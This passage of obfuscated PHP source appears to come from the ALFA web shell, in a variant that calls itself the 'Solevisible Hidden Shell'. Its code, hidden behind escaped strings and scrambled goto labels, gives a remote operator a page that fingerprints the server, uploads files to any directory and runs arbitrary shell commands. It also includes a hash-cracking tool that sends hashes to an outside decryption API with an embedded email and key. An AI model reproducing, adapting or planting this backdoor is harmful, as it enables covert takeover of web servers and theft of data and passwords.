"\103\157\156\164\145\x6e\164\x2d\154\x65\156\147\x74\150\x3a\40" . strlen($post) . "\15\12"; $http .= "\x43\x6f\156\156\145\143\x74\x69\157\156\x3a\40\143\x6c\x6f\163\145\xd\12\xd\12"; $http .= $post . "\15\xa\15\12"; fwrite($socket, $http); $contents = ''; while (!@feof($socket)) { $contents .= @fgets($socket, 4096); } list($header, $body) = explode("\xd\12\xd\12", $contents, 2); @fclose($socket); return $body; } else { return ''; } } goto i_y5V; pr1zO: function alfacheckcgi() { if (strlen(alfaEx("\151\x64", false, true, true)) > 0) { echo "\x6f\153"; } else { echo "\x6e\157"; } } goto nWc3X; mG6El: $OVpGNqqFZs = "\x65" . "\166" . "\141\x6c"; goto W1P0Y; TMWW9: if (!isset($GLOBALS["\x44\102\137\x4e\x41\x4d\x45"]["\163\x68\x6f\167\137\151\x63\157\156\x73"])) { die("\44\107\x4c\117\102\x41\x4c\123\x5b\47\x44\x42\x5f\x4e\x41\115\105\x27\135\x5b\47\163\150\x6f\x77\137\151\x63\157\156\163\x27\x5d"); } goto uDSKO; VBrHH: function alfaarchive_manager() { alfahead(); $file = $_POST["\141\154\146\141\62"]; if (!file_exists($file)) { $file = $GLOBALS["\143\167\x64"]; } $rand_id = rand(9999, 999999); echo "\x3c\144\x69\x76\40\143\x6c\x61\163\x73\x3d\x68\145\141\144\x65\162\x3e\74\x63\145\x6e\164\145\x72\76\x3c\x70\x3e\x3c\144\151\x76\x20\x63\154\x61\x73\163\x3d\42\164\170\164\x66\x6f\x6e\x74\x5f\x68\145\x61\144\145\162\x22\x3e\174\40\x41\x72\x63\x68\151\166\x65\x20\115\141\156\x61\147\x65\x72\40\x7c\x3c\57\x64\151\166\x3e\x3c\x2f\160\76"; echo "\x3c\x66\157\x72\155\40\x6e\141\x6d\x65\x3d\42\163\162\143\x68\x22\40\x6f\156\x53\x75\142\155\x69\164\75\42\x67\x28\47\141\162\x63\x68\151\x76\145\x5f\155\141\156\141\x67\145\162\x27\x2c\x6e\x75\154\x6c\54\x6e\x75\x6c\x6c\54\x74\150\151\x73\56\x66\151\154\145\x2e\166\x61\154\x75\x65\x2c\x6e\x75\154\x6c\x2c\156\165\x6c\154\x2c\47\76\x3e\x27\51\73\162\145\164\x75\162\x6e\x20\146\141\154\x73\x65\73\x22\x20\x6d\145\164\150\x6f\144\75\47\160\x6f\163\164\x27\x3e\12\11\x3c\144\x69\166\40\x63\154\141\x73\163\75\42\x74\x78\164\x66\x6f\x6e\x74\x22\x3e\12\11\101\x72\143\150\x69\166\145\x20\146\x69\x6c\145\72\x20\x3c\151\156\x70\165\x74\40\163\x69\x7a\145\75\42\65\60\x22\x20\151\x64\x3d\x22\x74\141\162\147\145\164\x22\x20\164\171\x70\x65\75\x22\x74\x65\x78\x74\x22\40\x6e\141\x6d\145\75\42\x66\151\154\145\42\x20\166\141\x6c\x75\x65\x3d\42" . $file . "\x22\x3e\xa\x9\74\151\156\160\x75\x74\40\164\171\x70\145\x3d\x22\163\x75\142\155\151\x74\x22\x20\x6e\141\155\145\75\x22\x62\164\156\x22\x20\x76\x61\154\165\x65\x3d\42\x20\x22\x3e\x3c\x2f\x64\x69\x76\76\x3c\57\146\x6f\162\x6d\76\x3c\x2f\x63\x65\156\x74\145\x72\76\x3c\x62\162\x3e"; if ($_POST["\x61\x6c\146\141\x35"] == "\76\x3e") { echo "\x3c\x68\162\x3e\74\x64\151\166\x20\x73\164\x79\154\145\x3d\x22\155\141\x72\x67\151\x6e\55\x6c\145\x66\164\72\x20\x31\x32\x70\x78\x3b\42\40\x61\162\x63\x68\x69\x76\145\137\146\x75\154\x6c\x3d\42\160\150\141\162\x3a\57\57" . $file . "\x22\x20\141\162\x63\150\x69\166\145\137\x6e\141\155\x65\x3d\42" . basename($file) . "\42\x20\151\x64\x3d\42\141\x72\143\150\151\166\145\137\x64\x69\162\x5f" . $rand_id . "\42\40\143\x6c\x61\163\x73\x3d\42\141\x72\143\150\x69\166\145\137\144\x69\162\137\150\157\x6c\x64\x65\x72\x22\x3e\x3c\x73\x70\141\156\76\120\x57\104\72\40\x3c\57\163\x70\x61\156\x3e\74\x64\151\166\x20\x63\x6c\141\x73\x73\x3d\x22\141\162\143\150\x69\166\x65\137\x70\167\x64\x5f\150\157\154\144\145\x72\42\x20\163\164\171\x6c\x65\75\42\x64\x69\163\160\154\x61\x79\72\151\x6e\154\x69\x6e\x65\x2d\x62\x6c\x6f\x63\x6b\42\76\74\x61\x3e\57\74\57\141\x3e\74\x2f\x64\151\x76\76\x3c\57\x64\x69\x76\x3e"; echo "\x3c\144\x69\x76\x20\163\164\171\154\x65\x3d\x22\160\x61\x64\x64\x69\x6e\x67\72\40\61\x30\160\170\x3b\x22\x20\x69\x64\75\x22\x61\162\143\x68\151\x76\x65\x5f\142\x61\x73\145\x5f" . $rand_id . "\42\x3e"; __alfa_open_archive_file($file, $rand_id); echo "\x3c\57\x64\151\166\x3e"; } echo "\74\57\144\151\166\76"; alfafooter(); } goto Sp5QA; he7vt: function alfacpcrack() { alfahead(); echo "\74\144\151\166\40\x63\154\x61\x73\x73\x3d\x68\145\141\x64\145\x72\76\74\143\145\156\x74\145\162\x3e\x3c\160\76\74\x64\151\166\x20\x63\x6c\141\x73\x73\75\42\164\170\x74\x66\157\156\x74\x5f\150\145\141\x64\x65\x72\x22\76\174\x20\110\x61\x73\x68\40\124\x6f\x6f\x6c\x73\40\174\74\x2f\x64\x69\x76\x3e\74\57\x70\76\74\x68\x33\x3e\74\x61\40\150\x72\145\x66\x3d\x6a\x61\166\141\163\143\x72\151\x70\164\72\x76\x6f\151\x64\50\60\51\40\157\x6e\143\154\151\143\153\75\x22\x67\x28\x27\143\x70\x63\162\141\x63\153\47\x2c\156\165\154\x6c\54\47\x64\145\x63\47\x29\x22\76\x7c\x20\x44\145\x43\162\x79\x70\x74\x65\162\40\174\x20\74\57\x61\76\74\x61\x20\150\x72\x65\146\75\x6a\141\166\141\x73\143\162\x69\160\164\x3a\166\x6f\151\x64\x28\x30\x29\40\x6f\x6e\143\x6c\151\x63\153\75\42\x67\50\x27\143\160\x63\x72\x61\143\x6b\47\x2c\x6e\165\x6c\154\x2c\x27\x61\x6e\141\154\x79\x7a\145\x72\47\51\42\76\x7c\x20\110\x61\163\150\40\101\156\141\154\x79\172\145\x72\40\174\x20\x3c\57\141\x3e\x3c\x2f\x68\63\x3e\x3c\x2f\143\x65\156\164\145\x72\x3e"; if ($_POST["\x61\154\x66\x61\61"] == "\x64\145\143") { $algorithms = array("\155\x64\x35" => "\115\104\65", "\x6d\144\64" => "\x4d\104\x34", "\x73\150\141\x31" => "\123\110\x41\61", "\163\150\x61\x32\65\66" => "\123\110\101\62\x35\66", "\x73\150\x61\x33\x38\x34" => "\123\110\101\63\70\64", "\163\x68\x61\x35\x31\x32" => "\x53\x48\101\65\x31\62", "\156\x74\x6c\x6d" => "\x4e\124\114\115"); echo "\74\x63\x65\156\164\x65\x72\x3e\74\x64\151\x76\40\x63\154\141\x73\163\75\42\164\170\x74\x66\x6f\156\x74\x5f\150\145\141\144\145\162\x22\x3e\x7c\40\104\x65\103\162\x79\x70\164\145\x72\40\x7c\x3c\57\x64\151\166\76\x3c\x62\x72\76\x3c\142\162\x3e\xa\x3c\146\x6f\162\x6d\40\x6f\x6e\x73\165\x62\x6d\151\x74\75\42\147\x28\47\x63\x70\143\x72\141\x63\x6b\47\x2c\156\165\x6c\x6c\x2c\47\x64\x65\x63\x27\x2c\x74\150\x69\x73\56\x6d\144\65\x2e\166\x61\x6c\165\x65\54\47\x3e\x3e\47\54\x74\150\x69\163\x2e\x61\x6c\x67\56\x76\x61\x6c\x75\145\x29\73\40\162\145\164\x75\162\156\x20\x66\141\x6c\x73\x65\73\42\x3e\74\144\x69\x76\40\143\154\141\163\163\x3d\x22\x74\170\x74\146\157\156\x74\x22\76\x44\x65\x63\x72\x79\160\164\x20\115\145\x74\x68\x6f\x64\72\x3c\57\144\x69\x76\76\40\x3c\163\x65\x6c\x65\143\164\x20\156\141\x6d\x65\x3d\x22\x61\x6c\x67\42\x20\163\x74\x79\154\x65\x3d\x22\167\151\144\164\x68\x3a\x31\60\60\x70\x78\x3b\42\x3e"; foreach ($algorithms as $key => $val) { echo "\x3c\x6f\x70\x74\151\157\x6e\x20\x76\x61\x6c\x75\145\75\42" . $key . "\x22\x3e" . $val . "\74\57\x6f\x70\x74\x69\x6f\x6e\x3e"; } echo "\x3c\57\163\145\x6c\145\143\x74\x3e\74\151\156\160\165\164\x20\164\171\x70\145\x3d\42\x74\x65\x78\x74\x22\x20\160\x6c\x61\x63\145\x68\157\154\x64\145\162\x3d\x22\110\141\163\x68\42\x20\x6e\x61\x6d\x65\x3d\42\155\x64\x35\42\x20\163\x69\172\x65\x3d\42\66\60\x22\x20\x69\144\x3d\42\164\x65\x78\164\x22\40\x2f\76\40\74\x69\156\160\x75\x74\x20\x74\171\160\145\75\42\x73\165\x62\155\151\164\x22\x20\166\141\154\x75\x65\75\x22\x20\x22\x20\156\x61\x6d\145\75\42\x67\157\x22\40\x2f\x3e\74\x2f\146\x6f\162\155\76\x3c\x2f\x63\145\x6e\x74\x65\x72\76\x3c\x62\x72\76"; if ($_POST["\141\154\146\141\63"] == "\76\76") { $hash = $_POST["\141\154\x66\141\62"]; if (!empty($hash)) { $hash_type = $_POST["\141\154\146\x61\x34"]; $email = "\163\157\154\x65\166\x69\x73\x69\x62\154\x65\x40\147\155\141\x69\x6c\56\x63\157\155"; $code = "\67\x62\71\x66\141\67\x39\x66\71\62\x63\x33\143\144\71\x36"; $target = "\150\x74\x74\x70\163\x3a\57\x2f\x6d\144\x35\144\145\x63\x72\171\x70\x74\x2e\x6e\x65\x74\x2f\x41\160\x69\57\141\x70\x69\x2e\160\150\160\x3f\x68\x61\x73\150\x3d" . $hash . "\x26\150\141\163\150\137\x74\171\x70\145\x3d" . $hash_type . "\46\x65\155\x61\151\x6c\75" . $email . "\x26\143\x6f\144\145\75" . $code; $resp = @file_get_contents($target); if ($resp == '') { $get = new AlfaCURL(); $resp = $get->Send($target); } echo __pre() . "\x3c\x63\145\x6e\x74\145\162\76"; switch ($resp) { case "\103\x4f\104\x45\40\x45\122\x52\105\x55\x52\x20\x3a\40\60\60\61": echo "\74\x62\76\x3c\146\157\x6e\164\x20\143\157\154\157\162\75\x27\x72\x65\x64\47\76\x59\157\165\x20\x65\170\x63\145\x65\144\x65\144\x20\x74\150\x65\40\64\60\x30\40\141\154\x6c\157\x77\145\144\x20\x72\x65\x71\x75\145\163\164\40\160\145\x72\x20\144\141\x79\x3c\57\146\157\x6e\164\76\74\57\142\76"; break; case "\103\x4f\x44\105\x20\x45\122\122\105\x55\x52\x20\x3a\40\60\x30\x33": echo "\x3c\142\76\74\x66\157\x6e\x74\x20\x63\157\x6c\x6f\x72\75\x27\x72\x65\144\x27\x3e\131\157\165\162\x20\x72\x65\x71\x75\x65\163\x74\40\x69\x6e\143\x6c\165\144\145\x73\x20\x6d\157\162\145\40\164\150\141\x6e\x20\64\x30\60\x20\x68\141\163\x68\x65\163\x2e\74\57\x66\x6f\156\x74\x3e\74\x2f\142\76"; break; case "\103\117\x44\x45\x20\105\122\x52\105\125\122\x20\x3a\x20\x30\x30\64": echo "\74\x62\x3e\74\146\x6f\156\164\40\x63\x6f\154\157\162\x3d\x27\x72\x65\144\x27\76\x54\x68\x65\x20\164\171\x70\145\x20\157\x66\40\x68\141\x73\150\x20\171\x6f\x75\40\160\x72\157\166\151\144\x65\x20\x69\x6e\40\164\x68\x65\40\141\162\147\x75\x6d\145\156\x74\40\150\141\163\x68\x5f\164\171\x70\145\40\144\x6f\145\x73\x6e\x27\164\x20\x73\145\x65\x6d\x20\164\157\x20\142\145\x20\166\x61\154\151\x64\74\57\x66\x6f\156\x74\76\x3c\57\142\76"; break; case "\x43\117\x44\105\x20\x45\x52\x52\x45\125\122\40\72\x20\60\x30\65": echo "\x3c\142\x3e\74\146\x6f\x6e\x74\x20\x63\157\x6c\157\162\75\x27\162\x65\x64\47\x3e\x54\150\x65\40\150\x61\x73\150\x20\171\157\165\x20\160\162\157\166\151\144\x65\40\x64\157\x65\163\x6e\x27\x74\x20\163\x65\145\155\40\164\x6f\x20\155\141\x74\x63\x68\x20\x77\151\164\150\40\x74\150\145\x20\164\x79\160\x65\40\157\x66\x20\x68\141\163\150\x20\x79\x6f\165\40\x73\145\164\56\x3c\57\x66\x6f\156\164\76\74\57\x62\x3e"; break; } if (substr($resp, 0, 4) != "\x43\x4f\104\x45" && $resp != '') { echo "\74\142\x3e\122\145\163\165\x6c\x74\x3a\x20\74\146\x6f\x6e\164\40\x63\157\154\157\x72\75\x27\147\162\x65\145\x6e\x27\76" . $resp . "\x3c\x2f\146\157\x6e\164\76\x3c\x2f\x62\x3e"; } elseif (substr($resp, 0, 4) != "\103\x4f\104\x45") { echo "\74\x66\x6f\x6e\x74\40\143\x6f\154\157\x72\75\x27\x72\145\144\47\x3e\116\x6f\124\40\106\x6f\165\156\x64\x3c\57\x66\x6f\156\x74\x3e\x3c\x62\x72\40\57\x3e"; } echo "\x3c\57\x63\x65\156\x74\145\x72\76"; } } } if ($_POST["\141\154\x66\x61\x31"] == "\141\x6e\141\x6c\x79\x7a\x65\x72") { echo "\74\x63\145\x6e\164\145\162\x3e\74\x70\76\x3c\x64\151\166\x20\143\x6c\141\163\163\x3d\x22\x74\x78\164\146\x6f\x6e\x74\137\x68\145\141\144\145\162\42\x3e\174\40\x48\141\163\150\40\101\156\141\154\x79\x7a\x65\162\40\x7c\74\57\x64\x69\x76\x3e\x3c\57\160\76\xa\74\x66\x6f\x72\155\x20\x6f\156\163\165\x62\155\151\x74\75\42\x67\x28\47\143\x70\143\162\141\x63\153\47\x2c\x6e\165\154\x6c\x2c\x27\141\156\x61\154\x79\172\145\x72\x27\x2c\x74\150\x69\163\x2e\150\141\x73\150\56\x76\141\154\x75\145\x2c\47\76\76\x27\51\73\x72\x65\x74\x75\x72\x6e\x20\146\141\154\163\x65\x3b\x22\x3e\xa\x3c\x64\x69\x76\40\143\154\141\x73\163\x3d\x22\x74\x78\x74\146\x6f\156\164\42\x3e\110\141\x73\150\72\x20\74\57\x64\x69\166\76\40\74\x69\x6e\x70\165\x74\40\x74\x79\x70\x65\75\42\x74\145\x78\x74\x22\40\160\x6c\x61\x63\145\150\x6f\154\144\145\x72\x3d\42\x48\141\163\x68\x22\40\156\x61\155\x65\75\42\150\x61\x73\150\42\x20\163\x69\172\145\75\42\x36\x30\42\x20\151\x64\x3d\x22\164\145\x78\164\42\x20\x2f\76\x20\x3c\x69\x6e\x70\x75\164\x20\164\171\160\x65\x3d\x22\163\x75\x62\x6d\x69\x74\42\40\x76\x61\x6c\165\145\75\42\40\42\40\156\141\155\145\75\42\147\157\x22\x20\x2f\x3e\x3c\x2f\146\157\x72\155\x3e\74\57\x63\x65\x6e\164\x65\x72\x3e\x3c\142\x72\76"; if ($_POST["\x61\154\x66\141\x33"] == "\76\x3e") { $hash = $_POST["\x61\154\146\x61\x32"]; if (!empty($hash)) { $curl = new AlfaCURL(); $resp = $curl->Send("\150\164\164\160\x73\x3a\x2f\x2f\155\144\65\x64\145\143\162\x79\x70\x74\56\156\145\164\57\145\156\57\110\141\x73\x68\x46\151\156\144\145\162\x2f", "\160\x6f\x73\x74", "\150\x61\163\150\x3d{$hash}\46\x63\162\171\160\164\x3d\x53\x65\141\x72\143\150"); echo __pre() . "\74\x63\145\156\164\145\x72\x3e"; if (preg_match("\x23\x3c\146\x69\145\x6c\144\163\145\164\x20\143\x6c\141\163\x73\x3d\42\x74\x72\157\165\166\145\x22\76\x28\56\52\77\51\x3c\x2f\146\151\x65\154\144\x73\x65\164\76\x23", $resp, $s)) { echo "\74\146\157\156\x74\40\x63\157\x6c\x6f\162\75\x22\x67\162\145\x65\x6e\x22\x3e" . $s[1] . "\74\57\x66\157\x6e\x74\76"; } else { echo "\x3c\146\157\x6e\164\x20\143\157\x6c\157\162\x3d\x22\x72\x65\x64\x22\76\x4e\157\164\40\x46\x6f\165\x6e\144\x2e\x2e\x2e\x21\74\57\x66\157\x6e\164\x3e"; } echo "\x3c\57\143\x65\156\164\x65\x72\76\x3c\x62\162\76"; } } } echo "\x3c\x2f\x64\x69\166\x3e"; alfafooter(); } goto BhkkX; i_y5V: if (isset($_GET["\163\157\154\145\x76\x69\163\151\142\154\x65"])) { @error_reporting(E_ALL ^ E_NOTICE); echo "\74\150\x74\155\154\76"; echo "\74\164\x69\x74\x6c\x65\76\123\157\154\145\x76\x69\x73\x69\x62\154\x65\40\110\151\x64\x64\x65\x6e\40\x53\150\145\x6c\x6c\74\x2f\x74\x69\164\x6c\145\x3e"; echo "\x3c\142\157\144\x79\x20\x62\x67\x63\x6f\154\x6f\x72\75\43\60\60\60\x30\x30\x30\76"; echo "\74\142\76\74\x62\x69\147\76\x3c\146\x6f\156\x74\40\x63\x6f\x6c\x6f\x72\75\x23\x37\x43\x46\x43\60\x30\76\x4b\145\162\156\x65\154\x20\72\x20\x3c\x2f\x66\x6f\x6e\164\x3e\74\x66\x6f\x6e\x74\x20\143\x6f\154\x6f\162\75\x22\x23\106\x46\x46\x46\x46\x22\76" . (function_exists("\x70\x68\x70\137\165\156\x61\x6d\x65") ? php_uname() : "\77\x3f\x3f") . "\74\57\x66\157\156\164\76\x3c\57\142\76\74\57\142\x69\147\x3e"; $safe_mode = @ini_get("\163\141\146\x65\137\155\x6f\x64\145"); if ($safe_mode) { $r = "\x3c\x62\40\163\164\x79\154\145\75\x27\x63\x6f\154\157\x72\x3a\x20\x72\145\x64\47\x3e\x4f\156\74\x2f\142\76"; } else { $r = "\74\x62\40\x73\164\171\x6c\x65\x3d\x27\143\x6f\154\x6f\162\72\x20\x67\162\145\145\x6e\x27\76\117\x66\146\x3c\x2f\x62\76"; } echo "\x3c\142\162\x3e\74\142\40\163\164\x79\x6c\145\x3d\47\x63\x6f\x6c\157\x72\x3a\40\43\67\103\106\103\60\x30\x27\x3e\117\x53\x3a\x20\x3c\57\x66\157\x6e\x74\x3e\x3c\x66\157\156\164\x20\143\157\x6c\157\x72\x3d\167\x68\151\x74\x65\x3e" . PHP_OS . "\x3c\57\146\x6f\156\164\76\74\x62\x72\x3e"; echo "\74\142\40\163\164\171\154\x65\x3d\x27\143\x6f\x6c\x6f\x72\72\x20\43\x37\103\x46\x43\60\60\x27\x3e\123\157\x66\164\167\x61\162\145\72\40\x3c\x2f\146\x6f\156\x74\x3e\x3c\146\157\156\x74\x20\x63\157\x6c\x6f\162\x3d\x77\x68\x69\x74\x65\76" . $_SERVER["\x53\x45\x52\x56\105\122\x5f\x53\x4f\x46\x54\x57\101\122\x45"] . "\x3c\x2f\146\157\x6e\164\76\74\x62\x72\76"; echo "\120\110\120\40\126\145\x72\x73\x69\x6f\156\x3a\40\x3c\146\x6f\x6e\x74\40\143\157\154\157\x72\x3d\167\x68\151\x74\145\x3e" . PHP_VERSION . "\x3c\57\x66\x6f\x6e\164\76\74\142\162\40\57\x3e"; echo "\120\127\104\x3a\74\x66\x6f\156\164\40\x63\157\154\x6f\x72\75\43\106\106\106\x46\x46\x46\76\40" . str_replace("\x5c", "\x2f", @alfaGetCwd()) . "\57\x3c\x62\x72\40\57\76"; echo "\x3c\x62\40\x73\164\x79\x6c\x65\x3d\47\x63\x6f\x6c\157\x72\x3a\40\x23\x37\x43\x46\103\60\x30\x27\x3e\123\x61\146\145\x20\x4d\x6f\x64\145\x20\x3a\40{$r}\74\142\162\x3e"; echo "\x3c\146\x6f\156\x74\x20\143\157\x6c\157\162\x3d\x23\67\x43\106\x43\x30\x30\76\104\x69\163\141\x62\x6c\145\40\146\x75\x6e\x63\x74\x69\157\156\x73\x20\x3a\x20\74\x2f\x66\x6f\156\164\x3e"; $disfun = @ini_get("\144\x69\163\141\142\154\x65\137\x66\165\156\x63\164\151\157\x6e\163"); if (empty($disfun)) { $disfun = "\74\146\x6f\x6e\164\40\143\x6f\x6c\x6f\162\x3d\42\x67\162\x65\145\156\x22\x3e\x4e\x4f\x4e\x45\x3c\x2f\x66\157\156\x74\76"; } echo "\74\x66\157\x6e\x74\40\x63\x6f\154\x6f\x72\75\162\x65\144\76"; echo "{$disfun}"; echo "\74\x2f\x66\157\x6e\x74\x3e\x3c\x62\162\76"; echo "\x3c\x62\40\x73\164\171\x6c\145\75\47\x63\x6f\154\x6f\162\72\40\43\67\103\106\x43\60\60\47\x3e\131\157\165\162\x20\111\x70\x20\101\x64\144\x72\x65\x73\163\x20\x69\x73\40\x3a\x20\x20\x3c\57\x66\x6f\x6e\164\x3e\74\146\157\156\164\x20\x63\157\154\157\x72\x3d\167\x68\151\x74\x65\x3e" . $_SERVER["\x52\x45\115\117\x54\x45\137\101\104\x44\122"] . "\74\57\x66\157\156\x74\76\x3c\x62\162\76"; echo "\x3c\x62\x20\x73\x74\171\x6c\x65\x3d\x27\143\157\154\x6f\162\72\40\43\67\x43\x46\103\x30\60\47\76\x53\145\x72\x76\x65\162\x20\x49\160\40\x41\144\x64\162\x65\163\163\40\x69\x73\40\72\40\x20\x3c\x2f\x66\157\156\164\x3e\74\x66\x6f\156\164\x20\x63\x6f\x6c\157\162\75\x77\x68\151\x74\x65\x3e" . (function_exists("\x67\x65\x74\x68\157\163\x74\x62\171\x6e\x61\x6d\x65") ? @gethostbyname($_SERVER["\x48\124\124\120\x5f\110\x4f\x53\124"]) : "\x3f\x3f\77") . "\74\x2f\146\x6f\156\164\76\x3c\x62\x72\x3e\74\x70\x3e"; echo "\x3c\x68\162\76\74\x63\145\156\x74\x65\x72\76\x3c\146\x6f\x72\x6d\40\x6f\156\123\165\142\155\151\164\75\42\x74\150\151\x73\56\x75\x70\154\x6f\141\x64\x2e\144\151\163\141\142\x6c\145\x64\x3d\164\162\x75\145\73\x74\x68\151\x73\56\x63\x77\144\56\166\x61\x6c\x75\145\40\x3d\40\142\164\157\141\50\x75\x6e\x65\x73\143\x61\160\x65\50\145\156\143\x6f\x64\x65\x55\122\x49\x43\x6f\x6d\160\157\156\x65\156\x74\50\164\150\x69\163\56\143\x77\144\56\166\x61\154\165\145\x29\x29\51\x3b\x22\40\141\x63\164\151\x6f\156\x3d\42\x22\x20\155\x65\x74\x68\157\144\75\42\160\x6f\163\x74\42\x20\145\x6e\x63\164\171\x70\145\x3d\x22\x6d\165\154\x74\x69\x70\141\162\164\57\x66\x6f\x72\x6d\x2d\144\141\x74\x61\42\40\x6e\x61\155\145\75\x22\165\x70\154\x6f\141\144\145\x72\42\40\x69\x64\x3d\x22\165\x70\x6c\x6f\141\144\145\162\42\76"; echo "\103\127\x44\x3a\x20\x3c\x69\156\160\x75\164\40\164\171\x70\145\x3d\x22\164\x65\x78\164\x22\40\156\141\x6d\145\75\42\143\x77\x64\42\40\x76\x61\x6c\165\x65\75\x22" . str_replace("\134", "\x2f", @alfaGetCwd()) . "\57\42\x20\x73\151\x7a\145\x3d\42\x35\x39\42\76\x3c\x70\x3e\74\151\x6e\x70\x75\x74\x20\164\x79\x70\x65\75\x22\x66\151\x6c\x65\42\40\x6e\141\155\145\x3d\x22\x66\x69\x6c\145\x22\x20\x73\x69\x7a\x65\75\42\x34\65\42\x3e\x3c\151\x6e\160\165\164\40\x6e\141\155\145\75\42\165\160\x6c\157\141\144\x22\40\164\x79\x70\145\x3d\42\x73\165\x62\155\x69\164\x22\x20\x69\x64\75\x22\x5f\165\160\x6c\42\40\x76\141\x6c\165\145\x3d\x22\125\160\x6c\157\141\x64\42\76\74\x2f\x70\x3e\x3c\57\x66\157\x72\x6d\x3e\74\x2f\143\145\156\164\145\162\76"; if (isset($_FILES["\146\151\x6c\x65"])) { if (@move_uploaded_file($_FILES["\x66\151\154\145"]["\164\155\x70\137\156\141\155\x65"], __ZGVjb2Rlcg(@$_POST["\x63\167\144"]) . "\x2f" . $_FILES["\146\x69\x6c\x65"]["\156\141\x6d\x65"])) { echo "\x3c\x62\x3e\x3c\146\157\x6e\x74\40\143\157\154\x6f\162\x3d\42\43\67\103\x46\x43\60\60\42\76\74\x63\145\x6e\164\x65\162\76\125\160\154\157\x61\x64\x20\123\x75\x63\143\145\163\163\146\165\x6c\x6c\171\40\73\51\x3c\57\146\x6f\x6e\x74\76\74\x2f\x61\76\74\x66\157\156\x74\40\143\x6f\x6c\x6f\x72\75\42\43\x37\x43\106\x43\x30\60\42\76\x3c\x2f\142\76\x3c\x62\x72\76\x3c\142\x72\76\74\57\x63\x65\x6e\164\x65\162\x3e"; } else { echo "\x3c\x63\x65\x6e\164\x65\162\76\74\x62\x3e\x3c\x66\157\x6e\x74\40\143\157\154\x6f\x72\75\x22\43\x37\103\x46\x43\60\60\42\76\125\x70\154\x6f\x61\x64\x20\x66\x61\x69\154\145\x64\x20\x3a\50\x3c\x2f\146\x6f\x6e\164\76\x3c\x2f\141\x3e\x3c\x66\157\156\x74\x20\143\x6f\x6c\x6f\x72\x3d\x22\43\67\103\106\103\60\42\x3e\74\57\x62\76\74\57\x63\x65\x6e\x74\145\x72\76\x3c\142\x72\x3e\74\142\x72\x3e"; } } echo "\74\x68\x72\x3e\x3c\146\157\x72\x6d\40\x6f\x6e\x53\165\142\155\151\x74\75\42\164\150\151\163\56\145\170\145\143\x75\x74\145\x2e\x64\x69\x73\x61\142\x6c\145\144\75\x74\162\165\145\73\164\x68\151\163\x2e\143\157\x6d\x6d\141\x6e\x64\x5f\x73\157\x6c\145\166\x69\x73\151\x62\x6c\145\x2e\166\141\154\x75\x65\x20\75\40\x62\x74\157\x61\50\x75\156\x65\163\x63\x61\x70\x65\x28\145\x6e\x63\x6f\x64\x65\125\x52\111\103\x6f\x6d\x70\x6f\x6e\x65\x6e\164\x28\x74\150\x69\x73\56\x63\x6f\x6d\x6d\141\156\x64\137\163\157\154\145\166\151\x73\x69\142\154\145\x2e\x76\x61\x6c\165\x65\51\x29\x29\73\x22\40\x6d\145\x74\x68\x6f\144\x3d\42\120\117\123\x54\42\76\105\170\145\143\165\x74\x65\40\103\157\x6d\155\x61\156\144\x3a\x20\x3c\151\x6e\160\x75\x74\x20\156\x61\x6d\145\x3d\42\x63\x6f\155\155\141\x6e\x64\x5f\163\x6f\154\145\166\151\163\151\x62\x6c\145\x22\40\166\x61\154\x75\x65\x3d\x22\42\40\x73\x69\172\145\x3d\x22\x35\71\42\x20\164\x79\160\145\x3d\42\164\x65\170\x74\x22\40\x61\x6c\151\147\156\75\42\154\x65\146\x74\42\x20\x3e\74\151\156\160\x75\164\40\x6e\x61\x6d\145\75\42\x65\170\145\x63\165\164\x65\42\x20\166\141\x6c\165\x65\x3d\x22\x45\x78\145\143\x75\x74\145\x22\x20\164\x79\160\x65\75\x22\163\165\x62\155\151\x74\42\76\x3c\x62\x72\76\74\57\x66\157\x72\155\76\xa\x3c\150\x72\76\x3c\160\x72\x65\76"; if (isset($_POST["\x63\157\155\155\141\x6e\144\137\x73\157\154\x65\x76\x69\x73\151\142\154\145"])) { if (strtolower(substr(PHP_OS, 0, 3)) == "\167\151\x6e") { $separator = "\46"; } else { $separator = "\73"; } $solevisible = "\143\144\40\47" . addslashes(str_replace("\x5c", "\57", @alfaGetCwd())) . "\47" . $separator . '' . __ZGVjb2Rlcg($_POST["\x63\157\x6d\155\141\x6e\144\x5f\x73\157\x6c\x65\x76\151\x73\151\142\154\145"]); echo alfaEx($solevisible); } echo "\74\x2f\160\162\x65\76\12\74\57\x62\x6f\144\x79\76\74\x2f\x68\x74\155\154\76"; die; } goto nhViU; BXSlk: @set_time_limit(0); goto Os8cj; pQYlh: function Alfa_StrSearcher($dir, $string, $ext, $e, $arr = array()) { if (@is_dir($dir)) { $files = @scandir($dir); foreach ($files as $key => $value) { $path = @realpath($dir . DIRECTORY_SEPARATOR . $value); if (!@is_dir($path)) { if ($ext != "\x2a") { $f = basename($path); $f = explode("\56", $f); $f = end($f); if ($f != $ext) { continue; } } if ($e == "\x73\164\162") { $content = @file_get_contents($path); if (strpos($content, $string) !== false) { echo str_replace("\x5c", "\57", $path) . "\x3c\142\x72\76"; } } else { if (strstr($value, $string)) { echo str_replace("\134", "\57", $path) . "\74\x62\x72\76"; } } $results[] = $path; } elseif ($value != "\x2e" && $value != "\x2e\56") { Alfa_StrSearcher($path, $string, $ext, $e, $results); $results[] = $path; } } } } goto zHgw5; HL3qe: function alfaEx($in, $re = false, $cgi = true, $all = false) { $data = _alfa_php_cmd($in, $re); if (empty($data) && $cgi || $all) { if ($GLOBALS["\x73\x79\x73"] == "\x75\156\x69\x78") { if (strlen(_alfa_php_cmd("\x77\x68\x6f\141\x6d\151")) == 0 || $all) { $cmd = _alfa_cgicmd($in); if (!empty($cmd)) { return $cmd; } } } } return $data; } goto KtNd0; rUSPf: @ini_set("\154\157\147\137\145\162\162\x6f\x72\x73", 0); goto CrZw0; oMz56: function __alfa_set_cookie($key, $value) { $_COOKIE[$key] = $value; @setcookie($key, $value, time() + 86400 * 7, "\57"); } goto hId6W; qr6DC: function __alert($s) { echo "\x3c\143\145\156\x74\145\x72\76" . __pre() . $s . "\74\57\143\x65\x6e\164\x65\162\76"; } goto Wo4n0; HVzUJ: if ($GLOBALS["\x73\171\x73"] == "\x77\151\156") { $GLOBALS["\x68\157\x6d\145\137\x63\167\x64"] = str_replace("\134", "\x2f", $GLOBALS["\x68\x6f\x6d\145\x5f\x63\167\144"]); $GLOBALS["\143\x77\x64"] = str_replace("\x5c", "\57", $GLOBALS["\x63\x77\x64"]); } goto FN_bJ; zUXll: function bcinit($evalType, $evalCode, $evalOptions, $evalArguments) { $res = 